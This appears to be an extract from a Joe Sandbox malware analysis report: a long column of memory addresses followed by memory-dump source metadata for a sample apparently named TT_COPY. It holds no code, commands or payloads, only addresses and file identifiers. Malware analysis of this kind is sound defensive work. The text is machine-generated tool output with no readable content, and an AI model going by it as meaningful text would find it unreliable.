                                                                                                                            0x00406e34
                                                                                                                            0x00406e37
                                                                                                                            0x00406e3a
                                                                                                                            0x00406e40
                                                                                                                            0x00406e45
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406e47
                                                                                                                            0x00406e5b
                                                                                                                            0x00406e5b
                                                                                                                            0x00406e5f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406e49
                                                                                                                            0x00406e4c
                                                                                                                            0x00406e4c
                                                                                                                            0x00406e53
                                                                                                                            0x00406e58
                                                                                                                            0x00406e58
                                                                                                                            0x00406e58
                                                                                                                            0x00406e61
                                                                                                                            0x00406e61
                                                                                                                            0x00406e64
                                                                                                                            0x00406e72
                                                                                                                            0x00406e78
                                                                                                                            0x00406e7d
                                                                                                                            0x00406e83
                                                                                                                            0x00406e89
                                                                                                                            0x00406e8f
                                                                                                                            0x00406e96
                                                                                                                            0x00406eaa
                                                                                                                            0x00406eaa
                                                                                                                            0x00407479
                                                                                                                            0x00407479
                                                                                                                            0x00407479
                                                                                                                            0x0040747e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406ab6
                                                                                                                            0x00406ab6
                                                                                                                            0x00000000
                                                                                                                            0x004070b1
                                                                                                                            0x004070b1
                                                                                                                            0x004070b5
                                                                                                                            0x004070b8
                                                                                                                            0x004070bb
                                                                                                                            0x004070be
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004070c4
                                                                                                                            0x004070c4
                                                                                                                            0x004070e9
                                                                                                                            0x004070e9
                                                                                                                            0x004070e9
                                                                                                                            0x004070eb
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004070c9
                                                                                                                            0x004070c9
                                                                                                                            0x004070cd
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004070d3
                                                                                                                            0x004070d3
                                                                                                                            0x004070d6
                                                                                                                            0x004070d9
                                                                                                                            0x004070dc
                                                                                                                            0x004070de
                                                                                                                            0x004070e0
                                                                                                                            0x004070e3
                                                                                                                            0x004070e6
                                                                                                                            0x004070e6
                                                                                                                            0x004070e6
                                                                                                                            0x004070ed
                                                                                                                            0x004070ed
                                                                                                                            0x004070f5
                                                                                                                            0x004070f8
                                                                                                                            0x004070fb
                                                                                                                            0x004070fe
                                                                                                                            0x00407102
                                                                                                                            0x00407105
                                                                                                                            0x00407107
                                                                                                                            0x0040710a
                                                                                                                            0x0040710c
                                                                                                                            0x00407120
                                                                                                                            0x00407120
                                                                                                                            0x00407123
                                                                                                                            0x0040713d
                                                                                                                            0x0040713d
                                                                                                                            0x00407140
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407146
                                                                                                                            0x00407146
                                                                                                                            0x00407149
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040714f
                                                                                                                            0x0040714f
                                                                                                                            0x00000000
                                                                                                                            0x0040714f
                                                                                                                            0x00407125
                                                                                                                            0x00407128
                                                                                                                            0x0040712f
                                                                                                                            0x00407132
                                                                                                                            0x00000000
                                                                                                                            0x00407132
                                                                                                                            0x0040710e
                                                                                                                            0x00407112
                                                                                                                            0x00407115
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040715a
                                                                                                                            0x0040715a
                                                                                                                            0x0040717f
                                                                                                                            0x0040717f
                                                                                                                            0x0040717f
                                                                                                                            0x00407181
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040715f
                                                                                                                            0x0040715f
                                                                                                                            0x00407163
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407169
                                                                                                                            0x00407169
                                                                                                                            0x0040716c
                                                                                                                            0x0040716f
                                                                                                                            0x00407172
                                                                                                                            0x00407174
                                                                                                                            0x00407176
                                                                                                                            0x00407179
                                                                                                                            0x0040717c
                                                                                                                            0x0040717c
                                                                                                                            0x0040717c
                                                                                                                            0x00407183
                                                                                                                            0x0040718b
                                                                                                                            0x0040718e
                                                                                                                            0x00407191
                                                                                                                            0x00407193
                                                                                                                            0x00407196
                                                                                                                            0x00407196
                                                                                                                            0x00407198
                                                                                                                            0x0040719c
                                                                                                                            0x0040719f
                                                                                                                            0x004071a2
                                                                                                                            0x004071a5
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004071ab
                                                                                                                            0x004071ab
                                                                                                                            0x004071d0
                                                                                                                            0x004071d0
                                                                                                                            0x004071d0
                                                                                                                            0x004071d2
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004071b0
                                                                                                                            0x004071b0
                                                                                                                            0x004071b4
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004071ba
                                                                                                                            0x004071ba
                                                                                                                            0x004071bd
                                                                                                                            0x004071c0
                                                                                                                            0x004071c3
                                                                                                                            0x004071c5
                                                                                                                            0x004071c7
                                                                                                                            0x004071ca
                                                                                                                            0x004071cd
                                                                                                                            0x004071cd
                                                                                                                            0x004071cd
                                                                                                                            0x004071d4
                                                                                                                            0x004071d4
                                                                                                                            0x004071dc
                                                                                                                            0x004071df
                                                                                                                            0x004071e2
                                                                                                                            0x004071e5
                                                                                                                            0x004071e9
                                                                                                                            0x004071ec
                                                                                                                            0x004071ee
                                                                                                                            0x004071f1
                                                                                                                            0x004071f4
                                                                                                                            0x0040720e
                                                                                                                            0x0040720e
                                                                                                                            0x00407211
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407217
                                                                                                                            0x00407217
                                                                                                                            0x0040721a
                                                                                                                            0x00407221
                                                                                                                            0x00000000
                                                                                                                            0x00407221
                                                                                                                            0x004071f6
                                                                                                                            0x004071f9
                                                                                                                            0x00407200
                                                                                                                            0x00407203
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407229
                                                                                                                            0x00407229
                                                                                                                            0x0040724e
                                                                                                                            0x0040724e
                                                                                                                            0x0040724e
                                                                                                                            0x00407250
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040722e
                                                                                                                            0x0040722e
                                                                                                                            0x00407232
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407238
                                                                                                                            0x00407238
                                                                                                                            0x0040723b
                                                                                                                            0x0040723e
                                                                                                                            0x00407241
                                                                                                                            0x00407243
                                                                                                                            0x00407245
                                                                                                                            0x00407248
                                                                                                                            0x0040724b
                                                                                                                            0x0040724b
                                                                                                                            0x0040724b
                                                                                                                            0x00407252
                                                                                                                            0x0040725a
                                                                                                                            0x0040725d
                                                                                                                            0x00407260
                                                                                                                            0x00407262
                                                                                                                            0x00407265
                                                                                                                            0x00407265
                                                                                                                            0x00407267
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040726d
                                                                                                                            0x0040726d
                                                                                                                            0x00407270
                                                                                                                            0x00407275
                                                                                                                            0x00407277
                                                                                                                            0x0040727d
                                                                                                                            0x0040727f
                                                                                                                            0x00407294
                                                                                                                            0x00407296
                                                                                                                            0x00407296
                                                                                                                            0x00407281
                                                                                                                            0x00407287
                                                                                                                            0x00407289
                                                                                                                            0x0040728b
                                                                                                                            0x0040728b
                                                                                                                            0x00407298
                                                                                                                            0x0040729c
                                                                                                                            0x0040729f
                                                                                                                            0x004072a5
                                                                                                                            0x004072a5
                                                                                                                            0x004072a8
                                                                                                                            0x004072a8
                                                                                                                            0x004072a8
                                                                                                                            0x004072aa
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004072b0
                                                                                                                            0x004072b0
                                                                                                                            0x004072b6
                                                                                                                            0x004072b8
                                                                                                                            0x004072dd
                                                                                                                            0x004072e0
                                                                                                                            0x004072e6
                                                                                                                            0x004072eb
                                                                                                                            0x004072f1
                                                                                                                            0x004072f7
                                                                                                                            0x004072f9
                                                                                                                            0x004072fc
                                                                                                                            0x00407305
                                                                                                                            0x0040730b
                                                                                                                            0x0040730b
                                                                                                                            0x004072fe
                                                                                                                            0x00407300
                                                                                                                            0x00407302
                                                                                                                            0x00407302
                                                                                                                            0x0040730d
                                                                                                                            0x00407313
                                                                                                                            0x00407315
                                                                                                                            0x00407318
                                                                                                                            0x0040731a
                                                                                                                            0x00407320
                                                                                                                            0x00407322
                                                                                                                            0x00407324
                                                                                                                            0x00407326
                                                                                                                            0x00407328
                                                                                                                            0x0040732b
                                                                                                                            0x00407334
                                                                                                                            0x00407337
                                                                                                                            0x00407337
                                                                                                                            0x0040732d
                                                                                                                            0x0040732d
                                                                                                                            0x00407330
                                                                                                                            0x00407330
                                                                                                                            0x0040732b
                                                                                                                            0x00407322
                                                                                                                            0x00407339
                                                                                                                            0x0040733b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040733b
                                                                                                                            0x004072ba
                                                                                                                            0x004072ba
                                                                                                                            0x004072c0
                                                                                                                            0x004072c6
                                                                                                                            0x004072c8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004072ca
                                                                                                                            0x004072ca
                                                                                                                            0x004072cc
                                                                                                                            0x004072ce
                                                                                                                            0x004072d7
                                                                                                                            0x004072d7
                                                                                                                            0x004072d0
                                                                                                                            0x004072d0
                                                                                                                            0x004072d3
                                                                                                                            0x004072d3
                                                                                                                            0x004072d9
                                                                                                                            0x004072db
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407341
                                                                                                                            0x00407341
                                                                                                                            0x00407346
                                                                                                                            0x00407348
                                                                                                                            0x00407349
                                                                                                                            0x0040734a
                                                                                                                            0x0040734b
                                                                                                                            0x00407351
                                                                                                                            0x00407354
                                                                                                                            0x00407357
                                                                                                                            0x0040735a
                                                                                                                            0x0040735c
                                                                                                                            0x00407362
                                                                                                                            0x00407362
                                                                                                                            0x00407365
                                                                                                                            0x00407365
                                                                                                                            0x00407365
                                                                                                                            0x00407365
                                                                                                                            0x0040736e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407373
                                                                                                                            0x00407373
                                                                                                                            0x00407376
                                                                                                                            0x00407379
                                                                                                                            0x0040737b
                                                                                                                            0x00407412
                                                                                                                            0x00407412
                                                                                                                            0x00407415
                                                                                                                            0x00407417
                                                                                                                            0x00407418
                                                                                                                            0x00407419
                                                                                                                            0x0040741c
                                                                                                                            0x00000000
                                                                                                                            0x0040741c
                                                                                                                            0x00407381
                                                                                                                            0x00407381
                                                                                                                            0x00407387
                                                                                                                            0x00407389
                                                                                                                            0x004073ae
                                                                                                                            0x004073b1
                                                                                                                            0x004073b7
                                                                                                                            0x004073bc
                                                                                                                            0x004073c2
                                                                                                                            0x004073c8
                                                                                                                            0x004073ca
                                                                                                                            0x004073cd
                                                                                                                            0x004073d6
                                                                                                                            0x004073dc
                                                                                                                            0x004073dc
                                                                                                                            0x004073cf
                                                                                                                            0x004073d1
                                                                                                                            0x004073d3
                                                                                                                            0x004073d3
                                                                                                                            0x004073de
                                                                                                                            0x004073e4
                                                                                                                            0x004073e6
                                                                                                                            0x004073e9
                                                                                                                            0x004073eb
                                                                                                                            0x004073f1
                                                                                                                            0x004073f3
                                                                                                                            0x004073f5
                                                                                                                            0x004073f7
                                                                                                                            0x004073f9
                                                                                                                            0x004073fc
                                                                                                                            0x00407405
                                                                                                                            0x00407408
                                                                                                                            0x00407408
                                                                                                                            0x004073fe
                                                                                                                            0x004073fe
                                                                                                                            0x00407401
                                                                                                                            0x00407401
                                                                                                                            0x004073fc
                                                                                                                            0x004073f3
                                                                                                                            0x0040740a
                                                                                                                            0x0040740c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040740c
                                                                                                                            0x0040738b
                                                                                                                            0x0040738b
                                                                                                                            0x00407391
                                                                                                                            0x00407397
                                                                                                                            0x00407399
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040739b
                                                                                                                            0x0040739b
                                                                                                                            0x0040739d
                                                                                                                            0x0040739f
                                                                                                                            0x004073a6
                                                                                                                            0x004073a6
                                                                                                                            0x004073a8
                                                                                                                            0x004073a1
                                                                                                                            0x004073a1
                                                                                                                            0x004073a3
                                                                                                                            0x004073a3
                                                                                                                            0x004073aa
                                                                                                                            0x004073ac
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407424
                                                                                                                            0x00407424
                                                                                                                            0x00407427
                                                                                                                            0x00407429
                                                                                                                            0x0040742c
                                                                                                                            0x0040742f
                                                                                                                            0x0040742f
                                                                                                                            0x0040742f
                                                                                                                            0x0040742f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406add
                                                                                                                            0x00406ac1
                                                                                                                            0x00000000
                                                                                                                            0x00406ac7
                                                                                                                            0x00406aca
                                                                                                                            0x00406ad4
                                                                                                                            0x00406ad7
                                                                                                                            0x00406ada
                                                                                                                            0x00000000
                                                                                                                            0x00406ada
                                                                                                                            0x00406ac1
                                                                                                                            0x00406ae5
                                                                                                                            0x00406ae8
                                                                                                                            0x00406aec
                                                                                                                            0x00406af6
                                                                                                                            0x00406b00
                                                                                                                            0x00406b03
                                                                                                                            0x00406b09
                                                                                                                            0x00406c3d
                                                                                                                            0x00406c3f
                                                                                                                            0x00406c45
                                                                                                                            0x00406c48
                                                                                                                            0x00406c4b
                                                                                                                            0x00000000
                                                                                                                            0x00406c4b
                                                                                                                            0x00406b0f
                                                                                                                            0x00406b0f
                                                                                                                            0x00406b10
                                                                                                                            0x00406b68
                                                                                                                            0x00406b68
                                                                                                                            0x00406b6f
                                                                                                                            0x00406c15
                                                                                                                            0x00406c15
                                                                                                                            0x00406c1a
                                                                                                                            0x00406c1d
                                                                                                                            0x00406c22
                                                                                                                            0x00406c25
                                                                                                                            0x00406c2a
                                                                                                                            0x00406c2d
                                                                                                                            0x00406c32
                                                                                                                            0x00406c35
                                                                                                                            0x00406c35
                                                                                                                            0x00000000
                                                                                                                            0x00406b75
                                                                                                                            0x00406b75
                                                                                                                            0x00406b75
                                                                                                                            0x00406b75
                                                                                                                            0x00406b79
                                                                                                                            0x00406b79
                                                                                                                            0x00406b9b
                                                                                                                            0x00406b9e
                                                                                                                            0x00406ba0
                                                                                                                            0x00406ba3
                                                                                                                            0x00406ba8
                                                                                                                            0x00406b7e
                                                                                                                            0x00406b7e
                                                                                                                            0x00406b83
                                                                                                                            0x00406b85
                                                                                                                            0x00406b87
                                                                                                                            0x00406b8c
                                                                                                                            0x00406b92
                                                                                                                            0x00406b97
                                                                                                                            0x00406b99
                                                                                                                            0x00406b99
                                                                                                                            0x00406b8e
                                                                                                                            0x00406b8e
                                                                                                                            0x00406b8e
                                                                                                                            0x00406b8c
                                                                                                                            0x00000000
                                                                                                                            0x00406baa
                                                                                                                            0x00406bd7
                                                                                                                            0x00406bdc
                                                                                                                            0x00406bde
                                                                                                                            0x00406bdf
                                                                                                                            0x00406be1
                                                                                                                            0x00406be2
                                                                                                                            0x00406be2
                                                                                                                            0x00406be2
                                                                                                                            0x00406c0a
                                                                                                                            0x00406c0f
                                                                                                                            0x00406c0f
                                                                                                                            0x00000000
                                                                                                                            0x00406c0f
                                                                                                                            0x00406ba8
                                                                                                                            0x00406b6f
                                                                                                                            0x00406b12
                                                                                                                            0x00406b12
                                                                                                                            0x00406b13
                                                                                                                            0x00406b5d
                                                                                                                            0x00000000
                                                                                                                            0x00406b5d
                                                                                                                            0x00406b15
                                                                                                                            0x00406b16
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406c72
                                                                                                                            0x00406c72
                                                                                                                            0x00406c72
                                                                                                                            0x00406c75
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406c52
                                                                                                                            0x00406c52
                                                                                                                            0x00406c56
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406c5c
                                                                                                                            0x00406c5c
                                                                                                                            0x00406c5f
                                                                                                                            0x00406c62
                                                                                                                            0x00406c67
                                                                                                                            0x00406c69
                                                                                                                            0x00406c6c
                                                                                                                            0x00406c6f
                                                                                                                            0x00406c6f
                                                                                                                            0x00406c6f
                                                                                                                            0x00406c77
                                                                                                                            0x00406c77
                                                                                                                            0x00406c7a
                                                                                                                            0x00406c7c
                                                                                                                            0x00406c81
                                                                                                                            0x00406c84
                                                                                                                            0x00406c86
                                                                                                                            0x00406c89
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406c8f
                                                                                                                            0x00406c8f
                                                                                                                            0x00406c91
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406c97
                                                                                                                            0x00406c97
                                                                                                                            0x00406c9b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406ca1
                                                                                                                            0x00406ca1
                                                                                                                            0x00406ca4
                                                                                                                            0x00406ca6
                                                                                                                            0x00406d44
                                                                                                                            0x00406d44
                                                                                                                            0x00406d47
                                                                                                                            0x00406d49
                                                                                                                            0x00406d49
                                                                                                                            0x00406d4c
                                                                                                                            0x00406d4f
                                                                                                                            0x00406d51
                                                                                                                            0x00406d53
                                                                                                                            0x00406d55
                                                                                                                            0x00406d55
                                                                                                                            0x00406d5e
                                                                                                                            0x00406d63
                                                                                                                            0x00406d66
                                                                                                                            0x00406d69
                                                                                                                            0x00406d6c
                                                                                                                            0x00406d6f
                                                                                                                            0x00406d6f
                                                                                                                            0x00406d6f
                                                                                                                            0x00406d72
                                                                                                                            0x00406d78
                                                                                                                            0x00406d78
                                                                                                                            0x00406d7e
                                                                                                                            0x00406d7e
                                                                                                                            0x00406d7e
                                                                                                                            0x00000000
                                                                                                                            0x00406d72
                                                                                                                            0x00406cac
                                                                                                                            0x00406cac
                                                                                                                            0x00406cb2
                                                                                                                            0x00406cb5
                                                                                                                            0x00406cb7
                                                                                                                            0x00406ce2
                                                                                                                            0x00406ce5
                                                                                                                            0x00406ceb
                                                                                                                            0x00406cf0
                                                                                                                            0x00406cf6
                                                                                                                            0x00406cfc
                                                                                                                            0x00406cfe
                                                                                                                            0x00406d01
                                                                                                                            0x00406d0a
                                                                                                                            0x00406d10
                                                                                                                            0x00406d10
                                                                                                                            0x00406d03
                                                                                                                            0x00406d05
                                                                                                                            0x00406d07
                                                                                                                            0x00406d07
                                                                                                                            0x00406d12
                                                                                                                            0x00406d18
                                                                                                                            0x00406d1b
                                                                                                                            0x00406d1d
                                                                                                                            0x00406d1f
                                                                                                                            0x00406d25
                                                                                                                            0x00406d27
                                                                                                                            0x00406d29
                                                                                                                            0x00406d2c
                                                                                                                            0x00406d35
                                                                                                                            0x00406d35
                                                                                                                            0x00406d37
                                                                                                                            0x00406d2e
                                                                                                                            0x00406d2e
                                                                                                                            0x00406d31
                                                                                                                            0x00406d31
                                                                                                                            0x00406d39
                                                                                                                            0x00406d39
                                                                                                                            0x00406d27
                                                                                                                            0x00406d3c
                                                                                                                            0x00406d3e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406d3e
                                                                                                                            0x00406cb9
                                                                                                                            0x00406cb9
                                                                                                                            0x00406cbf
                                                                                                                            0x00406cc5
                                                                                                                            0x00406cc7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406cc9
                                                                                                                            0x00406cc9
                                                                                                                            0x00406ccb
                                                                                                                            0x00406ccd
                                                                                                                            0x00406cd0
                                                                                                                            0x00406cd7
                                                                                                                            0x00406cd7
                                                                                                                            0x00406cd9
                                                                                                                            0x00406cd2
                                                                                                                            0x00406cd2
                                                                                                                            0x00406cd4
                                                                                                                            0x00406cd4
                                                                                                                            0x00406cdb
                                                                                                                            0x00406cdd
                                                                                                                            0x00406ce0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406de4
                                                                                                                            0x00406de7
                                                                                                                            0x00406dea
                                                                                                                            0x00406df0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406fc7
                                                                                                                            0x00406fc7
                                                                                                                            0x00406fc7
                                                                                                                            0x00406fca
                                                                                                                            0x00406fcd
                                                                                                                            0x00406fcf
                                                                                                                            0x00406fd2
                                                                                                                            0x00406fd8
                                                                                                                            0x00406fdf
                                                                                                                            0x00406fe1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406eb5
                                                                                                                            0x00406eb5
                                                                                                                            0x00406edd
                                                                                                                            0x00406edd
                                                                                                                            0x00406edd
                                                                                                                            0x00406edf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406ebd
                                                                                                                            0x00406ebd
                                                                                                                            0x00406ec1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406ec7
                                                                                                                            0x00406ec7
                                                                                                                            0x00406eca
                                                                                                                            0x00406ecd
                                                                                                                            0x00406ed0
                                                                                                                            0x00406ed2
                                                                                                                            0x00406ed4
                                                                                                                            0x00406ed7
                                                                                                                            0x00406eda
                                                                                                                            0x00406eda
                                                                                                                            0x00406eda
                                                                                                                            0x00406ee1
                                                                                                                            0x00406ee1
                                                                                                                            0x00406ee9
                                                                                                                            0x00406eec
                                                                                                                            0x00406ef2
                                                                                                                            0x00406ef5
                                                                                                                            0x00406ef9
                                                                                                                            0x00406efd
                                                                                                                            0x00406f00
                                                                                                                            0x00406f03
                                                                                                                            0x00406f1b
                                                                                                                            0x00406f1b
                                                                                                                            0x00406f1e
                                                                                                                            0x00406f2c
                                                                                                                            0x00406f2f
                                                                                                                            0x00406f20
                                                                                                                            0x00406f20
                                                                                                                            0x00406f22
                                                                                                                            0x00406f29
                                                                                                                            0x00406f29
                                                                                                                            0x00406f58
                                                                                                                            0x00406f58
                                                                                                                            0x00406f58
                                                                                                                            0x00406f5b
                                                                                                                            0x00406f5d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406f38
                                                                                                                            0x00406f38
                                                                                                                            0x00406f3c
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406f42
                                                                                                                            0x00406f42
                                                                                                                            0x00406f45
                                                                                                                            0x00406f48
                                                                                                                            0x00406f4b
                                                                                                                            0x00406f4d
                                                                                                                            0x00406f4f
                                                                                                                            0x00406f52
                                                                                                                            0x00406f55
                                                                                                                            0x00406f55
                                                                                                                            0x00406f55
                                                                                                                            0x00406f5f
                                                                                                                            0x00406f5f
                                                                                                                            0x00406f61
                                                                                                                            0x00406f63
                                                                                                                            0x00406f6e
                                                                                                                            0x00406f71
                                                                                                                            0x00406f74
                                                                                                                            0x00406f76
                                                                                                                            0x00406f78
                                                                                                                            0x00406f7a
                                                                                                                            0x00406f7d
                                                                                                                            0x00406f80
                                                                                                                            0x00406f85
                                                                                                                            0x00406f88
                                                                                                                            0x00406f8b
                                                                                                                            0x00406f8e
                                                                                                                            0x00406f95
                                                                                                                            0x00406f98
                                                                                                                            0x00406f9a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406fa0
                                                                                                                            0x00406fa0
                                                                                                                            0x00406fa4
                                                                                                                            0x00406fb5
                                                                                                                            0x00406fb5
                                                                                                                            0x00406fb5
                                                                                                                            0x00406fb7
                                                                                                                            0x00406fb7
                                                                                                                            0x00406fbb
                                                                                                                            0x00406fbb
                                                                                                                            0x00406fbb
                                                                                                                            0x00406fbd
                                                                                                                            0x00406fbe
                                                                                                                            0x00406fc1
                                                                                                                            0x00406fc1
                                                                                                                            0x00406fc1
                                                                                                                            0x00406fc4
                                                                                                                            0x00000000
                                                                                                                            0x00406fc4
                                                                                                                            0x00406fa6
                                                                                                                            0x00406fa6
                                                                                                                            0x00406fa9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406faf
                                                                                                                            0x00406faf
                                                                                                                            0x00000000
                                                                                                                            0x00406faf
                                                                                                                            0x00406f05
                                                                                                                            0x00406f05
                                                                                                                            0x00406f07
                                                                                                                            0x00406f09
                                                                                                                            0x00406f0c
                                                                                                                            0x00406f0f
                                                                                                                            0x00406f13
                                                                                                                            0x00406f13
                                                                                                                            0x00406fe7
                                                                                                                            0x00406fe7
                                                                                                                            0x00406fea
                                                                                                                            0x00406ff1
                                                                                                                            0x00406ff5
                                                                                                                            0x00406ff7
                                                                                                                            0x00406ffa
                                                                                                                            0x00406ffd
                                                                                                                            0x00407002
                                                                                                                            0x00407005
                                                                                                                            0x00407007
                                                                                                                            0x00407008
                                                                                                                            0x0040700b
                                                                                                                            0x00407016
                                                                                                                            0x00407019
                                                                                                                            0x00407030
                                                                                                                            0x00407035
                                                                                                                            0x0040703c
                                                                                                                            0x00407041
                                                                                                                            0x00407045
                                                                                                                            0x00407047
                                                                                                                            0x00407047
                                                                                                                            0x00407047
                                                                                                                            0x0040704a
                                                                                                                            0x0040704c
                                                                                                                            0x00000000
                                                                                                                            0x00407052
                                                                                                                            0x00407052
                                                                                                                            0x00407056
                                                                                                                            0x00407061
                                                                                                                            0x00407074
                                                                                                                            0x00407079
                                                                                                                            0x0040707e
                                                                                                                            0x00407080
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407086
                                                                                                                            0x00407086
                                                                                                                            0x00407089
                                                                                                                            0x0040708b
                                                                                                                            0x00407099
                                                                                                                            0x00407099
                                                                                                                            0x0040709c
                                                                                                                            0x0040709c
                                                                                                                            0x0040709f
                                                                                                                            0x004070a2
                                                                                                                            0x004070a5
                                                                                                                            0x004070a8
                                                                                                                            0x004070ab
                                                                                                                            0x004070ae
                                                                                                                            0x00000000
                                                                                                                            0x004070ae
                                                                                                                            0x0040708d
                                                                                                                            0x0040708d
                                                                                                                            0x00407093
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407093
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00407432
                                                                                                                            0x00407432
                                                                                                                            0x00407438
                                                                                                                            0x0040743e
                                                                                                                            0x00407443
                                                                                                                            0x00407449
                                                                                                                            0x0040744f
                                                                                                                            0x00407451
                                                                                                                            0x00407454
                                                                                                                            0x0040745d
                                                                                                                            0x00407463
                                                                                                                            0x00407463
                                                                                                                            0x00407456
                                                                                                                            0x00407458
                                                                                                                            0x0040745a
                                                                                                                            0x0040745a
                                                                                                                            0x00407465
                                                                                                                            0x00407467
                                                                                                                            0x0040746a
                                                                                                                            0x004074a5
                                                                                                                            0x004074a5
                                                                                                                            0x00000000
                                                                                                                            0x0040746c
                                                                                                                            0x0040746c
                                                                                                                            0x0040746c
                                                                                                                            0x00407472
                                                                                                                            0x00407475
                                                                                                                            0x00407477
                                                                                                                            0x004074ac
                                                                                                                            0x004074ae
                                                                                                                            0x00000000
                                                                                                                            0x004074ae
                                                                                                                            0x00000000
                                                                                                                            0x00407477
                                                                                                                            0x00000000
                                                                                                                            0x00406ab6
                                                                                                                            0x00407484
                                                                                                                            0x00000000
                                                                                                                            0x00407484
                                                                                                                            0x00406e98
                                                                                                                            0x00406e9a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406e9c
                                                                                                                            0x00406e9c
                                                                                                                            0x00406e9f
                                                                                                                            0x00000000
                                                                                                                            0x00406e9f
                                                                                                                            0x00406de4
                                                                                                                            0x00406da5
                                                                                                                            0x00407489
                                                                                                                            0x0040748c
                                                                                                                            0x0040748e
                                                                                                                            0x00407497
                                                                                                                            0x0040749d
                                                                                                                            0x00000000

                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
